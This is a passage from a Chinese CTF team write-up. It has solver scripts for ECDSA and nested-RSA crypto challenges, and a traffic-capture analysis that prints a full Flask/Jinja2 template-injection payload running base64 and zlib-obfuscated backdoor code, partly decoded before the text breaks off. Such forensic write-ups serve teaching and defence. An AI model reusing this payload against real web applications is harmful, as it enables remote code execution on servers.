队伍名称:VMw@r3
学校/单位名称:暨南大学
总分:631
理论知识总分:230
排名:923
密码学
ECDSA
# 源码第 9-11 行
digest_int = int.from_bytes(sha512(b"Welcome to this challenge!").digest(), "big")
curve_order = NIST521p.order
priv_int = digest_int % curve_order私钥priv_int并不是随机生成的,而是由固定字符串"Welcome to this challenge!"经过SHA-512哈希计算得到的。这意味着私钥是固定的、已知的。
exp:
import hashlib
from ecdsa import NIST521p
# --- 第一步:计算私钥 ---
# 1. 准备题目中的种子字符串
seed = b"Welcome to this challenge!"
# 2. 计算 SHA-512 哈希
digest_val = hashlib.sha512(seed).digest()
# 3. 转换为整数
digest_int = int.from_bytes(digest_val, "big")
# 4. 获取 NIST521p 曲线的阶 (Order)
curve_order = NIST521p.order
# 5. 取模得到私钥 (d)
priv_int = digest_int % curve_order
print(f"[+] 算出私钥 (十进制): {priv_int}")
# --- 第二步:生成 Flag ---
# 题目要求:flag{私钥的MD5值}
# 通常情况下,指的是私钥的“十进制字符串”的 MD5
priv_str = str(priv_int)
flag_content = hashlib.md5(priv_str.encode()).hexdigest()
print(f"[+] 最终 Flag: flag{{{flag_content}}}")
FLAG:flag{581bdf717b780c3cd8282e5a4d50f3a0}
RSA_NestingDoll
import gmpy2
import sys
from Crypto.Util.number import long_to_bytes
# 设置递归深度,防止递归分解时报错
sys.setrecursionlimit(2000)
# ================= 题目数据 =================
n1 = 16141229822582999941795528434053604024130834376743380417543848154510567941426284503974843508505293632858944676904777719167211264225017879544879766461905421764911145115313698529148118556481569662427943129906246669392285465962009760415398277861235401144473728421924300182818519451863668543279964773812681294700932779276119980976088388578080667457572761731749115242478798767995746571783659904107470270861418250270529189065684265364754871076595202944616294213418165898411332609375456093386942710433731450591144173543437880652898520275020008888364820928962186107055633582315448537508963579549702813766809204496344017389879
n = 484831124108275939341366810506193994531550055695853253298115538101629337644848848341479419438032232339003236906071864005366050185096955712484824249228197577223248353640366078747360090084446361275032026781246854700074896711976487694783856878403247312312487197243272330518861346981470353394149785086635163868023866817552387681890963052199983782800993485245670437818180617561464964987316161927118605512017355921555464359512280368738197370963036482455976503266489446554327046948670215814974461717020804892983665655107351050779151227099827044949961517305345415735355361979690945791766389892262659146088374064423340675969505766640604405056526597458482705651442368165084488267428304515239897907407899916127394598273176618290300112450670040922567688605072749116061905175316975711341960774150260004939250949738836358264952590189482518415728072191137713935386026127881564386427069721229262845412925923228235712893710368875996153516581760868562584742909664286792076869106489090142359608727406720798822550560161176676501888507397207863998129261472631954482761264406483807145805232317147769145985955267206369675711834485845321043623959730914679051434102698588945009836642922614296598336035078421463808774940679339890140690147375340294139027290793
c = 657984921229942454933933403447729006306657607710326864301226455143743298424203173231485254106370042482797921667656700155904329772383820736458855765136793243316671212869426397954684784861721375098512569633961083815312918123032774700110069081262242921985864796328969423527821139281310369981972743866271594590344539579191695406770264993187783060116166611986577690957583312376226071223036478908520539670631359415937784254986105845218988574365136837803183282535335170744088822352494742132919629693849729766426397683869482842748401000853783134170305075124230522253670782186531697976487673160305610021244587265868919495629
e = 65537
# ================= 1. 准备素数表 (关键修正) =================
print("[*] Generating prime sieve...")
# 题目中 factor = getPrime(20),最大可能到 2^20 (约104万)
# 必须覆盖这个范围,否则找不到因子!
limit = 1050000
primes = []
is_prime = [True] * (limit + 1)
for i in range(2, limit + 1):
if is_prime[i]:
primes.append(i)
for j in range(i * i, limit + 1, i):
is_prime[j] = False
print(f"[*] Found {len(primes)} primes up to {limit}.")
# ================= 2. 稳健的 Pollard p-1 分解 =================
def find_factor_pollard_p1_robust(N, primes_list):
"""
尝试从复合数 N 中分离出一个因子。
使用 n1 作为预乘指数,然后批量乘以小素数。
如果批量导致 GCD=N,则进行回溯和逐个检查。
"""
if gmpy2.is_prime(N):
return N
print(f"[*] Attempting to factor modulus of size {N.bit_length()} bits...")
# 核心:利用 p-1 包含 n1 的因子的特性
# 先计算 base = 2^n1 mod N
g = gmpy2.powmod(2, n1, N)
# 如果一开始就是 1,说明 n1 已经足够分解它了(不太可能,但如果是,说明 n1 是 lcm 的倍数)
d_initial = gmpy2.gcd(g - 1, N)
if 1 < d_initial < N:
return d_initial
if d_initial == N:
# 极端情况:n1 直接让所有因子都变为 1
# 这时候需要减小指数,比如不用 n1,从 2 开始慢慢乘
print("[!] n1 is too strong initially. Restarting with base 2.")
g = 2
block_size = 200 # 批量处理大小
for i in range(0, len(primes_list), block_size):
chunk = primes_list[i : i + block_size]
# 计算当前批次的乘积指数
E_chunk = 1
for p in chunk:
E_chunk *= p
# 尝试应用这个批次
new_g = gmpy2.powmod(g, E_chunk, N)
d = gmpy2.gcd(new_g - 1, N)
if d == 1:
# 还没找到,继续累积
g = new_g
if i % 10000 == 0 and i > 0:
print(f" Processed {i} primes...")
elif 1 < d < N:
# 成功找到因子!
print(f"[+] Found factor! {d}")
return d
elif d == N:
# 碰撞!这一批次太猛了,导致 g 变成了 1 (mod 所有因子)
# 我们需要回退到 g (上一轮的状态),然后在这个 chunk 里逐个乘
print(f"[!] Collision detected at chunk {i}. Drilling down single primes...")
# 使用旧的 g 逐个尝试
temp_g = g
for single_p in chunk:
temp_g = gmpy2.powmod(temp_g, single_p, N)
d_single = gmpy2.gcd(temp_g - 1, N)
if 1 < d_single < N:
print(f"[+] Found factor during drill-down: {d_single}")
return d_single
# 如果跑完了还是 N (理论上不应该,除非上一步状态已经坏了),则无法挽救
print("[-] Drill down failed. This shouldn't happen if math holds.")
return N
return N # 没找到
# 主循环分解逻辑
factors_found = []
composites = [n]
while composites:
curr_n = composites.pop(0)
# 尝试分解 curr_n
factor = find_factor_pollard_p1_robust(curr_n, primes)
if factor == curr_n:
# 分解失败或它是素数
if gmpy2.is_prime(curr_n):
print(f"[+] Identified prime factor: {curr_n}")
factors_found.append(curr_n)
else:
print(f"[-] Failed to decompose composite: {curr_n}")
# 如果这里失败了,说明素数表还不够大,或者结构特殊
# 对于这道题,1050000 limit 绝对够了
break
else:
# 成功分解,将两个因子放回队列继续处理
print(f"[+] Split successful. Adding parts to queue.")
composites.append(factor)
composites.append(curr_n // factor)
# 如果我们已经找到了 4 个因子,检查是否都是素数
if len(factors_found) + len(composites) == 4 and all(gmpy2.is_prime(x) for x in composites):
factors_found.extend(composites)
break
print(f"\n[*] Total prime factors found: {len(factors_found)}")
# ================= 3. 还原内层模数因子并解密 =================
if len(factors_found) == 4:
print("[*] Recovering inner factors (p1, q1, r1, s1)...")
factors_n1 = []
for p_outer in factors_found:
# p1 = GCD(p - 1, n1)
p1 = gmpy2.gcd(p_outer - 1, n1)
if p1 > 1:
factors_n1.append(p1)
else:
print(f"[-] Error recovering p1 from {p_outer}")
if len(factors_n1) == 4:
print("[+] All inner factors recovered.")
# 计算 Phi(n1)
phi = 1
for p in factors_n1:
phi *= (p - 1)
# 计算私钥 d
try:
d = gmpy2.invert(e, phi)
# 解密
m = gmpy2.powmod(c, d, n1)
flag_padded = long_to_bytes(m)
print("\n" + "="*30)
print("[+] Decrypted Message:")
print(flag_padded)
try:
print("[+] Flag:", flag_padded.decode())
except:
pass
print("="*30)
except Exception as err:
print(f"[-] Error during decryption: {err}")
else:
print("[-] Could not recover all 4 inner factors.")
else:
print("[-] Need exactly 4 factors of n to proceed.")flag{fak3_r5a_0f_euler_ph1_of_RSA_040a2d35}
流量分析
SnakeBackdoor-1
可以看到流量包从No.26042到No.28201一直在爆破密码。根据No.28402发生重定向到/admin/panel可知No.28397最后一次爆破成功,后台密码为zxcvbnm123

FLAG:flag{zxcvbnm123}
SnakeBackdoor-2
过滤器筛选
http contains "SECRET_KEY" 找到唯一包体,追踪http流,查找SECRET_KEY,在一堆html中找到SECRET_KEY的值:'SECRET_KEY': 'c6242af0-6891-4510-8432-e1cdf051

SnakeBackdoor-3
往下找到一个可疑Payload

{{url_for.__globals__['__builtins__']['exec']("import base64; exec(base64.b64decode('XyA9IGxhbWJkYSBfXyA6IF9faW1wb3J0X18oJ3psaWInKS5kZWNvbXByZXNzKF9faW1wb3J0X18oJ2Jhc2U2NCcpLmI2NGRlY29kZShfX1s6Oi0xXSkpOwpleGVjKChfKShiJz1jNENVM3hQKy8vdlB6ZnR2OGdyaTYzNWEwVDFyUXZNbEtHaTNpaUJ3dm02VEZFdmFoZlFFMlBFajdGT2NjVElQSThUR3FaTUMrbDlBb1lZR2VHVUFNY2Fyd1NpVHZCQ3YzN3lzK04xODVOb2NmbWpFL2ZPSGVpNE9uZTBDTDVUWndKb3BFbEp4THI5VkZYdlJsb2E1UXZyamlUUUtlRytTR2J5Wm0rNXpUay9WM25aMEc2TmVhcDdIdDZudSthY3hxc3Ivc2djNlJlRUZ4ZkVlMnAzMFlibXl5aXMzdWFWMXArQWowaUZ2cnRTc01Va2hKVzlWOVMvdE8rMC82OGdmeUtNL3lFOWhmNlM5ZUNEZFFwU3lMbktrRGlRazk3VFV1S0RQc09SM3BRbGRCL1VydmJ0YzRXQTFELzljdFpBV2NKK2pISkwxaytOcEN5dktHVmh4SDhETEw3bHZ1K3c5SW5VLzl6dDFzWC9Uc1VSVjdWMHhFWFpOU2xsWk1acjFrY0xKaFplQjhXNTl5bXhxZ3FYSkpZV0ppMm45NmhLdFNhMmRhYi9GMHhCdVJpWmJUWEZJRm1ENmtuR3ovb1B4ZVBUenVqUHE1SVd0OE5abXZ5TTVYRGcvTDhKVS9tQzRQU3ZYQStncWV1RHhMQ2x6Uk5ESEpVbXZ0a2FMYkp2YlpjU2c3VGdtN1VTZUpXa0NRb2pTaStJTklFajVjTjErRkZncEtSWG40Z1I5eXAzL1Y3OVduU2VFRklPNkM0aGNKYzRtd3BrKzA5dDF5dWU0K21BbGJobHhuWE0xUGZrK3NHQm1hVUZFMWtFak9wbmZHbnFzVithdU9xakpnY0RzaXZJZCt3SFBIYXp0NU1WczRySFJoWUJPQjZ5WGp1R1liRkhpM1hLV2hiN0FmTVZ2aHg3RjlhUGpObUlpR3FCVS9oUkZVdU1xQkNHK1ZWVVZBYmQ1cEZEVFpKM1A4d1V5bTZRQUFZUXZ4RytaSkRSU1F5cE9oWEsvTDRlRkZ0RXppdWZaUFN5cllQSldKbEFRc0RPK2RsaTQ2Y24xdTVBNUh5cWZuNHZ3N3pTcWUrVlVRL1JpL0tudjBwUW9XSDFkOWRHSndEZnFtZ3ZuS2krZ05SdWdjZlVqRzczVjZzL3RpaGx0OEIyM0t2bUp6cWlMUHptdWhyMFJGVUpLWmpHYTczaUxYVDRPdmxoTFJhU2JUVDR0cS9TQ2t0R1J5akxWbVNqMmtyMEdTc3FUamxMMmw2Yy9jWEtXalJNdDFrTUNtQ0NUVithSmU0bnB2b0I5OU9NbktuWlI0WXM1MjZtVEZUb1N3YTVqbXhCbWtSWUNtQTgyR0ZLN2FrNmJJUlRmRE1zV0dzWnZBRVh2M1BmdjVOUnpjSUZOTzN0YlFrZUIvTElWT1c1TGZBa21SNjgvNnpyTDBEWm9QanpGWkk1VkxmcTBydjlDd1VlSmtSM1BIY3VqKytkL2xPdms4L2gzSHpTZ1lUR0N3bDF1ano4aDRvVWlQeUdUNzROamJZN2ZKOHZVSHFOeitaVmZPdFZ3L3ozUk11cVNVekVBS3JqY1UyRE5RZWhCMG9ZN3hJbE9UOXU5QlQ0Uk9vREZvKzVaRjZ6Vm9IQTRlSWNrWFVPUDN5cFF2NXBFWUcrMHBXNE15SG1BUWZzT2FXeU1kZk1vcWJ3L005b0ltZEdLZEt5MVdxM2FxK3QreHV5VmROQVFNaG9XMkE3elF6b2I4WEdBM0c4VnVvS0hHT2NjMjVIQ2IvRlllU3hkd3lJZWRBeGtsTExZTUJIb2pUU3BEMWRFeG96ZGk4OUdpa2h6MzMwNW5kVG1FQ3YwWm9VT0hhY25xdFVVaEpseTdWZ3ZYK0psYXdBWTlvck5QVW1aTTdRS2JkT2tUZi9vOGFRbFM1RmUveFFrT01KR200TlhxTGVoaVJJYjkyNXNUZlZ4d29OZlA1djFNR2xhcllNaWZIbDJyRXA1QzcxaXBGanBBR2FFcDluUmowSmdFYTRsU1R1WWVWWHdxYlpRVDNPZlF2Z3QvYkhKbEFndXFTV3lzR2hxaElUSllNNlQxMG03MUppd2ZRSDVpTFhINVhiRms1M1FHY0cyY0FuRnJXeTcweEV2YWJtZjB1MGlrUXdwVTJzY1A4TG9FYS9DbEpuUFN1V3dpY01rVkxya1pHcW5CdmJrNkpUZzdIblQwdkdVY1Y2a2ZmSUw2Q0szYkUxRnkwUjZzbCtVUG9ZdmprZ1NJM1ViZkQ2N2JSeEl4ZWdCcFlUenlDRHpQeXRTRSthNzdzZHhzZ2hMcFVDNWh4ejRaZVhkeUlyYm1oQXFRdzVlRW5CdUFTRTVxVE1Ka1RwLy9oa3krZFQycGNpT0JZbi9BQ1NMeHByTFowQXkxK3pobCtYeVY5V0ZMNE5nQm9IMzRidmt4SDM2bmN0c3pvcFdHUHlkMTRSaVM0ZDBFcU5vY3F2dFd1M1l4a05nUCs4Zk0vZC9CMGlreEt4aC9HamttUVhhU1gvQis0MFU0YmZTYnNFSnBWT3NUSFR5NnUwTnI2N1N3N0J2Und1VnZmVDAvOGo3M2dZSEJPMmZHU0lKNDdBcllWbTIrTHpSVDBpSDVqN3lWUm1wdGNuQW44S2t4SjYzV0JHYjd1M2JkK0QrM3lsbm0xaDRBUjdNR042cjZMeHBqTmxBWDExd2EvWEIxek44Y1dVTm5DM1ZjemZ3VUV3UGZpNWR5bzluRUM1V085VW03OFdLUnJtM2M0OEl2VFVoZ2ROZVFFRG9zSWZoTVNtaWtFbHVRWDhMY0NSY0s5ZVVUODVidnI1SjVyekViK0R1aUdZeURGRzdQWmVmdkliM3czM3UycTh6bHhsdFdDU3RjNU80cThpV3JWSTd0YVpIeG93VHc1ekpnOVRkaEJaK2ZRclF0YzB5ZHJCbHZBbG5ZMTB2RUNuRlVCQSt5MWxXc1ZuOGNLeFVqVGRhdGk0QUYzaU0vS3VFdFE2Wm44Ykk0TFl3TWxHbkNBMVJHODhKOWw3RzRkSnpzV3I5eE9pRDhpTUkyTjFlWmQvUVV5NDNZc0lMV3g4MHlpQ3h6K0c0YlhmMnFOUkZ2Tk9hd1BTbnJwdjZRMG9GRVpvamx1UHg3Y09VMjdiQWJncHdUS28wVlV5SDZHNCt5c3ZpUXpVN1NSZDUxTEdHM1U2Y1QwWURpZFFtejJld3Ria2tLY0dWY1N5WU9lQ2xWNkNSejZiZEYvR20zVDIrUTkxNC9sa1piS3gxOVduWDc4cit4dzZicGp6V0xyMEUxZ2puS0NWeFcwWFNud2UraUc5ZGtHOG5DRmZqVWxoZFRhUzFnSjdMRnNtVWpuOHUvdlJRYlJMdy95NjZJcnIveW5LT0N6Uk9jZ3JuREZ4SDN6M0pUUVFwVGlEcGV5elJzRjRTbkdCTXY1SGJyK2NLNllUYTRNSWJmemo1VGkzRk1nSk5xZ0s1WGs5aHNpbEdzVTZ0VWJucDZTS2lKaFV2SjhicXluVU1Fem5kbCtTK09WUkNhSDJpSmw4VTNXanlCNjhScTRIQVRrL2NLN0xrSkhITWpDM1c3ZFRtT0JwZm9XTVZFTGFMK1JrcVdZdjBDcFc1cUVOTGxuT1BCckdhR05lSVphaHpibnJ1RVBJSVhHa0d6MWZFNWQ0Mk1hS1pzQ1VZdDF4WGlhaTkrY2JLR2ovZDBsSUNxN3VjN2JSaEVCeDQ2RHlCWFR6MWdmSm5UMnVyNng0QXZiNXdZMnBjWXJjRDJPUjZBaWtNdm0yYzBiaGFiSkI2bzBEaE9OSjRsQ3htS2RHQnp1d3J0czF1MEQyeXVvMzd5TExmc0dEdXllcE53OGx5VE5jMm55aENWQmZXMjNEbkJRbVdjMVFMQ29ScHBWaGpLWHdPcE9ES084UjhZSG5RTStyTGs2RU9hYkNkR0s1N2lSek1jVDN3YzQzNmtWbUhYRGNJMFpzWUdZNWFJQzVEYmRXalV0Mlp1VTBMbXVMd3pDVFM5OXpoT29POERLTnFiSzRiSU5MeUFJMlg5Mjh4aWIraG1JT3FwM29TZ0MyUGRGYzh5cXRoTjlTNTVvbXRleDJ4a0VlOENZNDhDNno0SnRxVnRxaFBRV1E4a3RlNnhsZXBpVllDcUliRTJWZzRmTi8vTC9mZi91Ly85cDRMejd1cTQ2eVdlbmtKL3g5MGovNW1FSW9yczVNY1N1Rmk5ZHlneXlSNXdKZnVxR2hPZnNWVndKZScpKQ=='))", {'request':url_for.__globals__['request'],'app':get_flashed_messages.__globals__['current_app']})}}发现这是一段远程加载并执行恶意代码,将其中的
XyA9IGxhbWJkYSBfXyA6IF9faW1wb3J0X18oJ3psaWInKS5kZWNvbXByZXNzKF9faW1wb3J0X18oJ2Jhc2U2NCcpLmI2NGRlY29kZShfX1s6Oi0xXSkpOwpleGVjKChfKShiJz1jNENVM3hQKy8vdlB6ZnR2OGdyaTYzNWEwVDFyUXZNbEtHaTNpaUJ3dm02VEZFdmFoZlFFMlBFajdGT2NjVElQSThUR3FaTUMrbDlBb1lZR2VHVUFNY2Fyd1NpVHZCQ3YzN3lzK04xODVOb2NmbWpFL2ZPSGVpNE9uZTBDTDVUWndKb3BFbEp4THI5VkZYdlJsb2E1UXZyamlUUUtlRytTR2J5Wm0rNXpUay9WM25aMEc2TmVhcDdIdDZudSthY3hxc3Ivc2djNlJlRUZ4ZkVlMnAzMFlibXl5aXMzdWFWMXArQWowaUZ2cnRTc01Va2hKVzlWOVMvdE8rMC82OGdmeUtNL3lFOWhmNlM5ZUNEZFFwU3lMbktrRGlRazk3VFV1S0RQc09SM3BRbGRCL1VydmJ0YzRXQTFELzljdFpBV2NKK2pISkwxaytOcEN5dktHVmh4SDhETEw3bHZ1K3c5SW5VLzl6dDFzWC9Uc1VSVjdWMHhFWFpOU2xsWk1acjFrY0xKaFplQjhXNTl5bXhxZ3FYSkpZV0ppMm45NmhLdFNhMmRhYi9GMHhCdVJpWmJUWEZJRm1ENmtuR3ovb1B4ZVBUenVqUHE1SVd0OE5abXZ5TTVYRGcvTDhKVS9tQzRQU3ZYQStncWV1RHhMQ2x6Uk5ESEpVbXZ0a2FMYkp2YlpjU2c3VGdtN1VTZUpXa0NRb2pTaStJTklFajVjTjErRkZncEtSWG40Z1I5eXAzL1Y3OVduU2VFRklPNkM0aGNKYzRtd3BrKzA5dDF5dWU0K21BbGJobHhuWE0xUGZrK3NHQm1hVUZFMWtFak9wbmZHbnFzVithdU9xakpnY0RzaXZJZCt3SFBIYXp0NU1WczRySFJoWUJPQjZ5WGp1R1liRkhpM1hLV2hiN0FmTVZ2aHg3RjlhUGpObUlpR3FCVS9oUkZVdU1xQkNHK1ZWVVZBYmQ1cEZEVFpKM1A4d1V5bTZRQUFZUXZ4RytaSkRSU1F5cE9oWEsvTDRlRkZ0RXppdWZaUFN5cllQSldKbEFRc0RPK2RsaTQ2Y24xdTVBNUh5cWZuNHZ3N3pTcWUrVlVRL1JpL0tudjBwUW9XSDFkOWRHSndEZnFtZ3ZuS2krZ05SdWdjZlVqRzczVjZzL3RpaGx0OEIyM0t2bUp6cWlMUHptdWhyMFJGVUpLWmpHYTczaUxYVDRPdmxoTFJhU2JUVDR0cS9TQ2t0R1J5akxWbVNqMmtyMEdTc3FUamxMMmw2Yy9jWEtXalJNdDFrTUNtQ0NUVithSmU0bnB2b0I5OU9NbktuWlI0WXM1MjZtVEZUb1N3YTVqbXhCbWtSWUNtQTgyR0ZLN2FrNmJJUlRmRE1zV0dzWnZBRVh2M1BmdjVOUnpjSUZOTzN0YlFrZUIvTElWT1c1TGZBa21SNjgvNnpyTDBEWm9QanpGWkk1VkxmcTBydjlDd1VlSmtSM1BIY3VqKytkL2xPdms4L2gzSHpTZ1lUR0N3bDF1ano4aDRvVWlQeUdUNzROamJZN2ZKOHZVSHFOeitaVmZPdFZ3L3ozUk11cVNVekVBS3JqY1UyRE5RZWhCMG9ZN3hJbE9UOXU5QlQ0Uk9vREZvKzVaRjZ6Vm9IQTRlSWNrWFVPUDN5cFF2NXBFWUcrMHBXNE15SG1BUWZzT2FXeU1kZk1vcWJ3L005b0ltZEdLZEt5MVdxM2FxK3QreHV5VmROQVFNaG9XMkE3elF6b2I4WEdBM0c4VnVvS0hHT2NjMjVIQ2IvRlllU3hkd3lJZWRBeGtsTExZTUJIb2pUU3BEMWRFeG96ZGk4OUdpa2h6MzMwNW5kVG1FQ3YwWm9VT0hhY25xdFVVaEpseTdWZ3ZYK0psYXdBWTlvck5QVW1aTTdRS2JkT2tUZi9vOGFRbFM1RmUveFFrT01KR200TlhxTGVoaVJJYjkyNXNUZlZ4d29OZlA1djFNR2xhcllNaWZIbDJyRXA1QzcxaXBGanBBR2FFcDluUmowSmdFYTRsU1R1WWVWWHdxYlpRVDNPZlF2Z3QvYkhKbEFndXFTV3lzR2hxaElUSllNNlQxMG03MUppd2ZRSDVpTFhINVhiRms1M1FHY0cyY0FuRnJXeTcweEV2YWJtZjB1MGlrUXdwVTJzY1A4TG9FYS9DbEpuUFN1V3dpY01rVkxya1pHcW5CdmJrNkpUZzdIblQwdkdVY1Y2a2ZmSUw2Q0szYkUxRnkwUjZzbCtVUG9ZdmprZ1NJM1ViZkQ2N2JSeEl4ZWdCcFlUenlDRHpQeXRTRSthNzdzZHhzZ2hMcFVDNWh4ejRaZVhkeUlyYm1oQXFRdzVlRW5CdUFTRTVxVE1Ka1RwLy9oa3krZFQycGNpT0JZbi9BQ1NMeHByTFowQXkxK3pobCtYeVY5V0ZMNE5nQm9IMzRidmt4SDM2bmN0c3pvcFdHUHlkMTRSaVM0ZDBFcU5vY3F2dFd1M1l4a05nUCs4Zk0vZC9CMGlreEt4aC9HamttUVhhU1gvQis0MFU0YmZTYnNFSnBWT3NUSFR5NnUwTnI2N1N3N0J2Und1VnZmVDAvOGo3M2dZSEJPMmZHU0lKNDdBcllWbTIrTHpSVDBpSDVqN3lWUm1wdGNuQW44S2t4SjYzV0JHYjd1M2JkK0QrM3lsbm0xaDRBUjdNR042cjZMeHBqTmxBWDExd2EvWEIxek44Y1dVTm5DM1ZjemZ3VUV3UGZpNWR5bzluRUM1V085VW03OFdLUnJtM2M0OEl2VFVoZ2ROZVFFRG9zSWZoTVNtaWtFbHVRWDhMY0NSY0s5ZVVUODVidnI1SjVyekViK0R1aUdZeURGRzdQWmVmdkliM3czM3UycTh6bHhsdFdDU3RjNU80cThpV3JWSTd0YVpIeG93VHc1ekpnOVRkaEJaK2ZRclF0YzB5ZHJCbHZBbG5ZMTB2RUNuRlVCQSt5MWxXc1ZuOGNLeFVqVGRhdGk0QUYzaU0vS3VFdFE2Wm44Ykk0TFl3TWxHbkNBMVJHODhKOWw3RzRkSnpzV3I5eE9pRDhpTUkyTjFlWmQvUVV5NDNZc0lMV3g4MHlpQ3h6K0c0YlhmMnFOUkZ2Tk9hd1BTbnJwdjZRMG9GRVpvamx1UHg3Y09VMjdiQWJncHdUS28wVlV5SDZHNCt5c3ZpUXpVN1NSZDUxTEdHM1U2Y1QwWURpZFFtejJld3Ria2tLY0dWY1N5WU9lQ2xWNkNSejZiZEYvR20zVDIrUTkxNC9sa1piS3gxOVduWDc4cit4dzZicGp6V0xyMEUxZ2puS0NWeFcwWFNud2UraUc5ZGtHOG5DRmZqVWxoZFRhUzFnSjdMRnNtVWpuOHUvdlJRYlJMdy95NjZJcnIveW5LT0N6Uk9jZ3JuREZ4SDN6M0pUUVFwVGlEcGV5elJzRjRTbkdCTXY1SGJyK2NLNllUYTRNSWJmemo1VGkzRk1nSk5xZ0s1WGs5aHNpbEdzVTZ0VWJucDZTS2lKaFV2SjhicXluVU1Fem5kbCtTK09WUkNhSDJpSmw4VTNXanlCNjhScTRIQVRrL2NLN0xrSkhITWpDM1c3ZFRtT0JwZm9XTVZFTGFMK1JrcVdZdjBDcFc1cUVOTGxuT1BCckdhR05lSVphaHpibnJ1RVBJSVhHa0d6MWZFNWQ0Mk1hS1pzQ1VZdDF4WGlhaTkrY2JLR2ovZDBsSUNxN3VjN2JSaEVCeDQ2RHlCWFR6MWdmSm5UMnVyNng0QXZiNXdZMnBjWXJjRDJPUjZBaWtNdm0yYzBiaGFiSkI2bzBEaE9OSjRsQ3htS2RHQnp1d3J0czF1MEQyeXVvMzd5TExmc0dEdXllcE53OGx5VE5jMm55aENWQmZXMjNEbkJRbVdjMVFMQ29ScHBWaGpLWHdPcE9ES084UjhZSG5RTStyTGs2RU9hYkNkR0s1N2lSek1jVDN3YzQzNmtWbUhYRGNJMFpzWUdZNWFJQzVEYmRXalV0Mlp1VTBMbXVMd3pDVFM5OXpoT29POERLTnFiSzRiSU5MeUFJMlg5Mjh4aWIraG1JT3FwM29TZ0MyUGRGYzh5cXRoTjlTNTVvbXRleDJ4a0VlOENZNDhDNno0SnRxVnRxaFBRV1E4a3RlNnhsZXBpVllDcUliRTJWZzRmTi8vTC9mZi91Ly85cDRMejd1cTQ2eVdlbmtKL3g5MGovNW1FSW9yczVNY1N1Rmk5ZHlneXlSNXdKZnVxR2hPZnNWVndKZScpKQ==使用Base64解码得到
_ = lambda __ : __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]));
exec((_)(b'=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